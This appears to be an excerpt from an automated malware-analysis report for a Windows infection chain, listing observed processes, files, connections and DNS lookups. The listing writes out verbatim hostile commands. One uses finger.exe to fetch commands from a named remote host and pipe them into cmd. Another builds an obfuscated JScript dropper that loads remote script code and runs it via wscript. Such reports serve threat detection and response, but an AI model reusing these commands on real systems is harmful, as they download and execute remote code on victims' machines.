Technical Information
- '<SYSTEM32>\finger.exe' ok@wea96.bombeirosgov.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\7hk.js"
- C:\users\public\7hk.js
- 'we###.#ombeirosgov.xyz':79
- 'et####.qeiouyftoyj.date':80
- 'we###.#ombeirosgov.xyz':79
- DNS ASK we###.#ombeirosgov.xyz
- DNS ASK et####.qeiouyftoyj.date
- '<SYSTEM32>\cmd.exe' /c finger.exe ok@wea96.bombeirosgov.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "Set LSQX=.j&&sET AZTGJ=vsGT3arsGT3 a =sGT3 'scsGT3risGT3ptsGT3:'; b =sGT3 'hsGT3TtPsGT3:'; GsGT3etsGT3ObjsGT3ecsGT3t(sGT3a+b+'&&sET YU2L=SESUTSESUTetaefj.qeiouyftoyj.dateSESUT?1SESUT')&...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 6LWA4="%AZTGJ:sGT3=%%YU2L:SESUT=/%" 0<nul 1>C:\Users\Public\7hk%LSQX%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\7hk%LSQX%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\7hk.js